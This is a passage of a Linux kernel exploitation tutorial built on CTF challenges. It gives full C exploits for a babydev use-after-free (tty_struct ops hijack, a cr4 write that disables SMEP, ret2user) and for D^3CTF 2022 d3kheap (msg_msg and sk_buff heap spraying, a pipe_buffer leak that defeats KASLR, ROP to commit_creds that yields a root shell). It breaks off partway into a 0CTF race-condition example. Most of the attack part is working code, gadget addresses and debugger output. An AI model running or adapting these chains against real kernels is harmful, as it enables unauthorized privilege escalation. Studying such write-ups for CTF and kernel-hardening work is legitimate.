struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;

struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
char name[64];
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */

struct {
spinlock_t lock;
bool stopped;
bool tco_stopped;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) flow;

struct {
spinlock_t lock;
struct pid *pgrp;
struct pid *session;
unsigned char pktstatus;
bool packet;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) ctrl;

int hw_stopped;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;

struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work; // contains a function pointer, which can leak the kernel base
struct tty_port *port;
} __randomize_layout;

The member to note is const struct tty_operations *ops.
It points to a tty_operations structure, defined in include/linux/tty_driver.h:

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

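Once the ROP chain runs, we write 0x6f0 to cr4 to bypass SMEP and then do ret2user. However, every time privilege escalation succeeds and we try to return to userland, execution faults at the pop rbp right after swapgs: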

   0xffffffff81063694 <native_swapgs+4>      swapgs 
► 0xffffffff81063697 <native_swapgs+7> pop rbp
0xffffffff81063698 <native_swapgs+8> ret

0xffffffff814e35ef <tty_audit_log+239> iretq
0xffffffff814e35f1 <tty_audit_log+241> ret

0xffffffff814e35f2 <tty_audit_log+242> dec dword ptr [rax - 0x75]
0xffffffff814e35f5 <tty_audit_log+245> push rbp
0xffffffff814e35f6 <tty_audit_log+246> test al, init_module+36 <72>
0xffffffff814e35f8 <tty_audit_log+248> mov esi, dword ptr [rbp - 0x50]
0xffffffff814e35fb <tty_audit_log+251> mov rdi, rbx
0xffffffff814e35fe <tty_audit_log+254> call audit_log_n_hex <audit_log_n_hex>
──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffeb93ba830 ◂— 0x0
01:0008│ 0x7ffeb93ba838 —▸ 0xffffffff814e35ef (tty_audit_log+239) ◂— iretq
02:0010│ 0x7ffeb93ba840 —▸ 0x402001 ◂— endbr64
03:0018│ 0x7ffeb93ba848 ◂— 0x33 /* '3' */
04:0020│ 0x7ffeb93ba850 ◂— 0x246
05:0028│ 0x7ffeb93ba858 —▸ 0x7ffeb93ba7d0 —▸ 0xffff880005fc7758 ◂— 0xcc
06:0030│ 0x7ffeb93ba860 ◂— 0x2b /* '+' */
07:0038│ 0x7ffeb93ba868 ◂— 0x0
──────────────────────────────────────────────────────────────────────────────────────────────────
► f 0 0xffffffff81063697 native_swapgs+7
──────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i all-registers cr3
cr3 0x5fe2000 [ PDBR=2 PCID=0 ]

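My guess is that KPTI really is enabled here, but then it is hard to see why the fault persists even after adding nopti. Note, however, that the module path shows a 4.4.72 kernel (mid-2017), and KPTI only reached the 4.4 stable series in early 2018. If that holds, KPTI is unlikely to be the cause, which would also explain why nopti makes no difference. Either way, the exploitation process of this challenge is now clear.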

The exp:

#define _GNU_SOURCE /* must come before every include */
// The inline asm below uses Intel syntax: build with -masm=intel
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <pthread.h>

size_t prepare_kernel_cred = 0xffffffff810a1810;
size_t commit_creds = 0xffffffff810a1420;
size_t init_cred = 0xffffffff82a6b700;
const size_t pop_rdi = 0xffffffff810d238d;
const size_t pop_rsi = 0xffffffff811dd9ae;
const size_t pop_rdx = 0xffffffff81440b72;
const size_t mov_rc4_rdi_pop_rbp = 0xffffffff81004d80;
const size_t swapgs_pop_rbp = 0xffffffff81063694;
const size_t iretq = 0xffffffff8181a797;
const size_t mov_rsp_rax_ret = 0xffffffff8181bfc5;
const size_t pop_rax_ret = 0xffffffff8100ce6e;
const size_t mov_rdi_rax_pop2 = 0xffffffff8133b32e;

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)


void info_log(char*);
void error_log(char*);
void saveStatus();
void get_shell();
void getRootPrivilige();
void bind_cpu(int);

size_t user_cs, user_ss, user_rflags, user_sp;


void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved Successfully!");
}


void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}

void get_shell(){
system("/bin/sh");
}


void getRootPrivilige(void)
{
void * (*prepare_kernel_cred_ptr)(void *) = (void *(*)(void *))prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void *))commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

int main(void){
saveStatus();
int i;

size_t buff[0x10] = {0};
size_t rop[0x100] = {0};
size_t fake_tty_operations[0x30] = {0};
PRINT_ADDR("fake_tty_operations", fake_tty_operations);
size_t tty_struct_padding[0x10] = {0};

int p = 0;
rop[p++] = pop_rdi;
rop[p++] = 0x6f0;
rop[p++] = mov_rc4_rdi_pop_rbp; /* mov cr4, rdi; pop rbp; ret: clears SMEP */
rop[p++] =((size_t)&rop&(~0xfff));
rop[p++] = (size_t)getRootPrivilige;
rop[p++] = swapgs_pop_rbp;
rop[p++] = ((size_t)&rop&(~0xfff));
rop[p++] = iretq;
/* iretq frame: rip, cs, rflags, rsp, ss */
rop[p++] = (size_t)get_shell;
rop[p++] = user_cs;
rop[p++] = user_rflags;
rop[p++] = user_sp;
rop[p++] = user_ss;


for(i = 0; i < 0x10; i++){
fake_tty_operations[i] = mov_rsp_rax_ret;
}
fake_tty_operations[0] = pop_rax_ret;
fake_tty_operations[1] = (size_t)rop;
int fd1 = open("/dev/babydev", O_RDWR);
int fd2 = open("/dev/babydev", O_RDWR);

ioctl(fd1, 0x10001, 0x2e0);
close(fd1);
//alloc the UAF chunk to tty_struct
int fd3 = open("/dev/ptmx", O_RDWR);

//overwrite the tty_struct->ops
read(fd2, tty_struct_padding, 0x30);
tty_struct_padding[3] = (size_t)fake_tty_operations;
write(fd2, tty_struct_padding, 0x30);
write(fd3, buff, 0x10);

}

Example: D^3CTF - kheap

1. Reversing the challenge

First, look at the startup script:

It enables SMEP, SMAP, KASLR and PTI, runs on two cores with two threads, and sets -monitor to /dev/null.

Next, look at the kernel config options the author kindly provided:

# D3CTF2022 - d3kheap

baby heap in kernel space, just sign me in plz :)

Here are some kernel config options you may need

```
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
```

Note that these two are enabled:

CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y

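One of them obfuscates freelist pointers by XORing them with a secret value, and the other randomizes the order of objects in the freelist.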

This combination of options is about as airtight as it gets.

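From the filesystem's init script we can see that a d3kheap.ko driver module is inserted, so the vulnerability almost certainly lives there. Let's continue the analysis.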

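The vulnerability is deliberately simple. The challenge author, a3 (arttnba3), wanted players to focus on exploitation rather than pure reverse engineering, which is the opposite of many userland challenges.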

Through ioctl we can allocate a 1 KiB chunk, and we get two chances to kfree it, which gives us a UAF. The bug is obvious, so the real question becomes how to exploit it.

2. socketpair basics

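This syscall is typically used in Linux network programming. It feels somewhat like pipe for inter-process communication, since both create a communication channel, but socketpair is full duplex.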

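Its usage is also similar to pipe: you pass an array of two ints, which receives the two connected endpoint fds. The syscall is defined as follows: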

SYSCALL_DEFINE4(socketpair, int, family, int, type, int, protocol,
int __user *, usockvec)
{
return __sys_socketpair(family, type, protocol, usockvec);
}

Only the syscall's definition is shown here.

3. sk_buff basics

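sk_buff is used throughout network message passing, including when we read from and write to the socketpair above. Here is its structure; it is very long, so only a small part is shown: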

struct sk_buff {
union {
struct {
/* These two members must be first. */
struct sk_buff *next;
struct sk_buff *prev;

union {
struct net_device *dev;
/* Some protocols might use this space to store information,
* while device pointer would be NULL.
* UDP receive path is one user.
*/
unsigned long dev_scratch;
};
};
struct rb_node rbnode; /* used in netem, ip4 defrag, and tcp stack */
struct list_head list;
};


/* These elements must be at the end, see alloc_skb() for details. */
sk_buff_data_t tail;
sk_buff_data_t end;
unsigned char *head,
*data;
unsigned int truesize;
refcount_t users;

#ifdef CONFIG_SKB_EXTENSIONS
/* only useable after checking ->active_extensions != 0 */
struct skb_ext *extensions;
#endif
};
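  • next: links this sk_buff to other sk_buffs, much like msg_msg does
  • prev: same as above
  • tail: points to where the actual data ends in the data area
  • end: points to the end of the data area (not the end of the actual data; explained below)
  • head: points to the start of the data area (not the start of the actual data)
  • data: points to where the actual data starts in the data area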

When we write through the socketpair above, i.e. send a packet, the kernel calls alloc_skb:

/**
* alloc_skb - allocate a network buffer
* @size: size to allocate
* @priority: allocation mask
*
* This function is a convenient wrapper around __alloc_skb().
*/
static inline struct sk_buff *alloc_skb(unsigned int size,
gfp_t priority)
{
return __alloc_skb(size, priority, 0, NUMA_NO_NODE);
}

It mainly calls __alloc_skb, so let's look at that:

/* 	Allocate a new skbuff. We do this ourselves so we can fill in a few
* 'private' fields and also do memory statistics to find all the
* [BEEP] leaks.
*
*/

/**
* __alloc_skb - allocate a network buffer
* @size: size to allocate
* @gfp_mask: allocation mask
* @flags: If SKB_ALLOC_FCLONE is set, allocate from fclone cache
* instead of head cache and allocate a cloned (child) skb.
* If SKB_ALLOC_RX is set, __GFP_MEMALLOC will be used for
* allocations in case the data is required for writeback
* @node: numa node to allocate memory on
*
* Allocate a new &sk_buff. The returned buffer has no headroom and a
* tail room of at least size bytes. The object has a reference count
* of one. The return is the buffer. On a failure the return is %NULL.
*
* Buffers may only be allocated from interrupts using a @gfp_mask of
* %GFP_ATOMIC.
*/
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;

cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;

...

else
skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node);
if (unlikely(!skb))
return NULL;
prefetchw(skb);

/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
...
}

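Focus on the code above. The struct sk_buff itself comes from its own dedicated cache, but the data area is allocated by kmalloc_reserve, which takes it from the general-purpose kmalloc caches. The requested size is first aligned, then the size of a struct skb_shared_info is added before allocating; that structure is 320 bytes.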

So a single sk_buff plus its data is laid out roughly like this:

To free them again, we simply read the corresponding packets from the other end.

4. Exploitation

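First we use the challenge's ioctl to allocate a 1 KiB chunk, free it immediately, and then allocate a 1 KiB msg_msg, which serves as the victim in this challenge. In testing, however, a 0x400 msg_msg allocated right after the free did not immediately get the freed kheap chunk. This puzzled me at first, until I found that someone had already asked about it. According to the challenge author a3: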

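Since this challenge runs on two cores with two threads, I also switched the startup script to a single core and single thread, but the chunk was still not reused immediately. Some doubt remains here :(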

Because we cannot tell which msg_queue's msg_msg got the freed chunk, we need to spray msg_queues and then identify the victim_msg_queue among them.

Here we borrow the idea from CVE-2021-22555 and build master/servant msg_msg pairs, as follows:

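In each msg_queue we allocate one master msg_msg (96 bytes) and one servant msg_msg (0x400 bytes, taken from the same kmem_cache as the challenge's kheap object). This layout later lets us read out the victim msg_msg's address.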

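Then we use up the challenge's second free. With the sk_buff technique described above, we spray sk_buffs to try to reclaim the freed kheap chunk. A msg_msg still lives in that chunk, so the sk_buff data lets us write a fake msg_msg header over it. We then read every msg_msg; the one whose read fails is the victim msg_msg.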

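Once we have found it, we can change its m_ts to get an out-of-bounds read and read the msg_msg next to it. After our heavy spraying the chunks are very likely adjacent, although a small chance of failure remains.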

First, note that within each msg_queue, the queue head and all its msg_msgs are linked in a doubly linked list through the list_head in struct msg_msg (m_list).

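So the out-of-bounds read gives us the prev pointer of the adjacent servant msg_msg, which points to the master msg_msg of that servant's queue. We then set the victim msg_msg's next (segment) pointer to that master, which leaks the address of the adjacent servant msg_msg. Subtracting 0x400 from it yields the address of our victim msg_msg.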

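With the victim msg_msg's virtual address in hand, we bring in another structure, the popular pipe_buffer. Creating a pipe allocates an array of pipe_buffer structures by default, and that array lands in the same 0x400 (kmalloc-1024) cache. Each struct pipe_buffer also holds a kernel pointer in its ops field, so we can leak the kernel base from it and overwrite the pipe_buffer->ops function table. We now know a kernel heap address and can rewrite its contents by repeatedly freeing and re-spraying sk_buffs, so forging this function table is easy. When both ends of the pipe are closed, the kernel calls pipe_buffer->ops->release, and from there an ordinary ROP chain completes the privilege escalation.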

The final exp:

#define _GNU_SOURCE
/* saveStatus() uses Intel-syntax inline asm: build with -masm=intel */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#define SK_QUEUE_NR 0x10
#define SK_BUFF_NR 0x80
#define MSG_QUEUE_NR 4096
#define MSG_TAG 0xDEADBEEF
#define PIPE_SPRAY_NR 0x80

#define MASTER_MSG_SZ 96
#define MASTER_MSG_TYPE 0x41
#define SERVANT_MSG_SZ 0x400
#define SERVANT_MSG_TYPE 0x42
#define VICTIM_MSG_TYPE 0xC0DE

#define ALLOC_FLAG 0x1234
#define FREE_FLAG 0xDEAD

#define ANON_PIPE_BUF_OPS 0xffffffff8203fe40
#define INIT_CRED 0xffffffff82c6d580
#define PUSH_RSI_POP_RSP_POP4_RET 0xffffffff812dbede
#define POP_RDI_RET 0xffffffff810938f0
#define COMMIT_CREDS 0xffffffff810d25c0
#define SWAPGS_RESTORE_REGS_AND_RETRUN_TO_USERMODE 0xffffffff81c00ff0

char fake_servant_msg[704]; /* sk_buff need include a tail, so the size(1024 - 320) should be set for the buff */
int dev_fd; /* using by filesystem */

struct msg_msg{
void* m_next;
void* m_prev;
long m_type;
size_t m_ts;
size_t next;
size_t security;
};

struct msg_msgseg{
size_t *next;
};

struct
{
long mtype;
char mtext[SERVANT_MSG_SZ - sizeof(struct msg_msg)];
}servant_msg;

struct
{
long mtype;
char mtext[MASTER_MSG_SZ - sizeof(struct msg_msg)];
}master_msg;

struct
{
long mtype;
char mtext[0x2000 - sizeof(struct msg_msg) - sizeof(struct msg_msgseg)];
}oob_msg;

struct pipe_buffer {
size_t page;
unsigned int offset, len;
size_t ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations{
size_t confirm;
size_t release;
size_t try_steal;
size_t get;
};

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

/*
* save the process current context
* */
size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}



#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}

long get_msg(void){
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long send_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
((struct msgbuf *)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz - sizeof(long), 0);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0);
}

long copy_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
}


void alloc(){
ioctl(dev_fd, ALLOC_FLAG, 0);
}

void delete(){
ioctl(dev_fd, FREE_FLAG, 0);
}

void spray_skb(int skb_queue[SK_QUEUE_NR][2], void *buffer, size_t size){
for(int i = 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(write(skb_queue[i][0], buffer, size) < 0){
error_log("Spraying sk_buff failed!");
}
}
}
}

void free_skb(int skb_queue[SK_QUEUE_NR][2], void *buffer, size_t size){
for(int i= 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(read(skb_queue[i][1], buffer, size) < 0){
error_log("Free sk_buff failed!");
}
}
}
}

void build_msg(struct msg_msg* builded_msg, void* m_next, void* m_prev, long mtype, size_t m_ts, size_t next){
builded_msg->m_next = m_next;
builded_msg->m_prev = m_prev;
builded_msg->m_type = mtype;
builded_msg->m_ts = m_ts;
builded_msg->next = next;
builded_msg->security = 0;
}

void get_rootshell(){
if(getuid()){
error_log("Privilege elevation failed!");
}
system("/bin/sh");
exit(0);
}

void main(){
int skb_queue[SK_QUEUE_NR][2];
int msg_queue[MSG_QUEUE_NR];
int pipe_fd[PIPE_SPRAY_NR][2];
int victim_qidx = -1;
size_t victim_addr;
struct msg_msg nearby_msg, nearby_master_msg;
struct pipe_buffer *pipe_buffer_ptr;
size_t *ROPchain;
size_t ropchain_idx;
struct pipe_buf_operations *ops_ptr;

size_t kernel_base, page_offset_base, kernel_offset, guess_page_offset;

info_log("Step I:Preserve the process context and bind one core... ");
bind_cpu(0);
saveStatus();

info_log("Step II:Spray the sk_queue and msg_queue...");
for(int i = 0; i < SK_QUEUE_NR; i++){
if(socketpair(AF_UNIX, SOCK_STREAM, 0, skb_queue[i]) < 0){
error_log("Allocate the socket_queue failed!");
}
}
for(int i = 0; i < MSG_QUEUE_NR; i++){
if((msg_queue[i] = get_msg()) < 0){
error_log("Allocate the msg_queue failed!");
}
}
dev_fd = open("/dev/d3kheap", O_RDONLY);
alloc();

info_log("Step III:Construct the UAF...");
memset(&master_msg, 0, sizeof(master_msg));
memset(&servant_msg, 0, sizeof(servant_msg));
for(int i = 0; i < MSG_QUEUE_NR; i++){
/* Allocate the master msg_msg */
*(int *)&master_msg.mtext[0] = MSG_TAG;
*(int *)&master_msg.mtext[4] = i;
if(send_msg(msg_queue[i], &master_msg, sizeof(master_msg), MASTER_MSG_TYPE) < 0){
error_log("Allocate the master msg_msg failed!");
}
/* Allocate the servant msg_msg */
*(int *)&servant_msg.mtext[0] = MSG_TAG;
*(int *)&servant_msg.mtext[4] = i;
if(send_msg(msg_queue[i], &servant_msg, sizeof(servant_msg), SERVANT_MSG_TYPE) < 0){
error_log("Allocate the servant msg_msg failed!");
}
/* First free the d3kheap object */
if(i == 1024)
delete();
}

info_log("Step IV:Search for the UAF msg_msg...");
/* Second free the d3kheap object */
delete();
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void*)"peiwithhao", *(long *)"peiwithhao", SERVANT_MSG_SZ, 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
for(int i = 0; i < MSG_QUEUE_NR; i++){
if(copy_msg(msg_queue[i], &servant_msg, sizeof(servant_msg), 1) < 0){
victim_qidx = i;
break;
}
}
if(victim_qidx == -1){
error_log("You have not found the victim msg_msg queue idx:(...");
}
printf("[+]the victim msg_msg idx is :%d\n", victim_qidx);
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));

info_log("Step V:Overread the victim msg_msg's nearby servant msg_msg");
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void *)"peiwithhao", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
/* We could oob read the next nearby servant msg_msg */
if(copy_msg(msg_queue[victim_qidx], &oob_msg, sizeof(oob_msg), 1) < 0){
error_log("OOB read failed!");
}
/*
* check the memory
*
for(int i = 0; i < 0x10; i++){
printf("[--- memory dump ---](%2d)0x%x\n", i, *(int *)&oob_msg.mtext[0x400 + i*4]);
}
*/
if(*(int *)&oob_msg.mtext[0x400] != MSG_TAG){
error_log("Unfortunately! The nearby object had already been occupied!");
}
nearby_msg = *(struct msg_msg*)&oob_msg.mtext[SERVANT_MSG_SZ - sizeof(struct msg_msg)];
guess_page_offset = (size_t)(nearby_msg.m_next)&(0xfffffffff0000000);
PRINT_ADDR("guess page_offset_base", guess_page_offset);

/*
* Find the victim msg_msg addr
* */
info_log("Step VI:Get the victim msg_msg addr through nearby servant msg_msg...");
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void *)"peiwithhao", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), (size_t)(nearby_msg.m_prev) - 8);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
if(copy_msg(msg_queue[victim_qidx], &oob_msg, sizeof(oob_msg), 1) < 0){
error_log("Cannot find the nearby master msg_msg...");
}
if(*(int *)&oob_msg.mtext[0x1000] != MSG_TAG){
error_log("Unfortunately! The nearby object had already been occupied!");
}
nearby_master_msg = *(struct msg_msg*)&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
PRINT_ADDR("nearby msg_msg addr", (size_t)nearby_master_msg.m_next);
victim_addr = (size_t)nearby_master_msg.m_next - 0x400;
PRINT_ADDR("victim_addr", victim_addr);

/*
* Construct the UAF sk_buff
* */
info_log("Step VII:Fix the msg_msg and free it, so we get the uaf sk_buff...");
memset(&fake_servant_msg, 0, sizeof(fake_servant_msg));
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
build_msg((struct msg_msg*)fake_servant_msg, (void *)victim_addr + 0x800 , (void *)victim_addr + 0x800, VICTIM_MSG_TYPE, SERVANT_MSG_SZ - sizeof(struct msg_msg), 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
if(recv_msg(msg_queue[victim_qidx], &servant_msg, sizeof(servant_msg), VICTIM_MSG_TYPE) < 0){
error_log("unlink the victim servant msg_msg failed!");
}

info_log("Step VIII:Make the pipe_buf with sk_buff in victim 1k object...");
for(int i = 0; i < PIPE_SPRAY_NR; i ++){
if(pipe(pipe_fd[i]) < 0){
error_log("Allocate the pipe failed!");
}
if(write(pipe_fd[i][1], "peiwithhao", 10) < 0){
error_log("Write to the pipe failed!");
}
}
pipe_buffer_ptr = (struct pipe_buffer *)&fake_servant_msg;
for(int i= 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(read(skb_queue[i][1], &fake_servant_msg, sizeof(fake_servant_msg)) < 0){
error_log("Free sk_buff failed!");
}
if(pipe_buffer_ptr->ops > 0xffffffff81000000){
kernel_offset = pipe_buffer_ptr->ops - ANON_PIPE_BUF_OPS;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}
PRINT_ADDR("kernel_base", kernel_base);
PRINT_ADDR("kernel_offset", kernel_offset);

info_log("Step IX:Hijack the pipe_buffer->ops->release...");
pipe_buffer_ptr = (struct pipe_buffer *)&fake_servant_msg;
pipe_buffer_ptr->page = *(size_t *)"peiwithhao";
pipe_buffer_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *)&fake_servant_msg[0x100];
ops_ptr->release = PUSH_RSI_POP_RSP_POP4_RET + kernel_offset;

ROPchain = (size_t *)&fake_servant_msg[0x20];
ropchain_idx = 0;
ROPchain[ropchain_idx++] = POP_RDI_RET + kernel_offset;
ROPchain[ropchain_idx++] = INIT_CRED + kernel_offset;
ROPchain[ropchain_idx++] = COMMIT_CREDS + kernel_offset;
ROPchain[ropchain_idx++] = SWAPGS_RESTORE_REGS_AND_RETRUN_TO_USERMODE + 22 + kernel_offset;
ROPchain[ropchain_idx++] = 0xdeadbeef;
ROPchain[ropchain_idx++] = 0xbeefdead;
ROPchain[ropchain_idx++] = (size_t)get_rootshell;
ROPchain[ropchain_idx++] = user_cs;
ROPchain[ropchain_idx++] = user_rflags;
ROPchain[ropchain_idx++] = user_sp + 8;
ROPchain[ropchain_idx++] = user_ss;

spray_skb(skb_queue, fake_servant_msg, sizeof(fake_servant_msg));
for(int i = 0; i < PIPE_SPRAY_NR; i++){
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

}

IV. Race Condition

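You have probably all heard the term. A race condition attack exploits flaws in the synchronization and mutual exclusion that are everywhere in modern computing: the outcome depends on the relative timing of concurrent threads, and the attacker steers that timing.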

Example: 0CTF 2018 Final - baby kernel

The whole module implements only ioctl:

__int64 __fastcall baby_ioctl(__int64 a1, __int64 a2)
{
__int64 v2; // rdx
int i; // [rsp-5Ch] [rbp-5Ch]
__int64 v5; // [rsp-58h] [rbp-58h]

_fentry__(a1, a2);
v5 = v2;
if ( a2 == 0x6666 )
{
printk("Your flag is at %px! But I don't think you know it's content\n", flag);
return 0LL;
}
else if ( a2 == 0x1337
&& !_chk_range_not_ok(v2, 16LL, *(__readgsqword(&current_task) + 0x1358))// check1: the 16-byte argument struct must lie below the user address limit (0x7ffff...)
&& !_chk_range_not_ok(*v5, *(v5 + 8), *(__readgsqword(&current_task) + 0x1358))// check2: the buffer the struct points to must also lie below that limit
&& *(v5 + 8) == strlen(flag) ) // check3: the length field must equal strlen(flag)
{
for ( i = 0; i < strlen(flag); ++i )
{
if ( *(*v5 + i) != flag[i] )
return 22LL;
}
printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
return 0LL;
}
else
{
return 14LL;
}
}

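The handler first gives us the flag's address (cmd 0x6666) and then compares the flag with the structure we pass in (cmd 0x1337). There are three checks:

  1. The argument structure itself must lie in user space (the limit read from (&current_task)+0x1358 can be found by dynamic debugging; it is the task's user address limit).
  2. The buffer the structure points to, [buf, buf + len), must lie in user space.
  3. The length field in the structure must equal strlen(flag).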
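The three checks can be modeled in user space to see exactly what they reject. This is a sketch that assumes the x86-64 semantics of `__chk_range_not_ok()` (reject if `addr + size` wraps around or ends above the limit) and assumes the limit is `0x7ffffffff000`, the usual TASK_SIZE_MAX with 4-level paging. `chk_range_not_ok`, `struct baby_arg` and `baby_checks_pass` are hypothetical names chosen for illustration. The model makes the key point visible: pointing `flag_addr` straight at the leaked kernel address fails check 2.

```c
#include <stdbool.h>
#include <stddef.h>

/* Assumed addr_limit of a user task: TASK_SIZE_MAX on x86-64, 4-level paging. */
#define USER_LIMIT 0x7ffffffff000UL

/* Same logic as x86 __chk_range_not_ok(): true means "reject".
 * The range is rejected if addr + size wraps around or ends above limit. */
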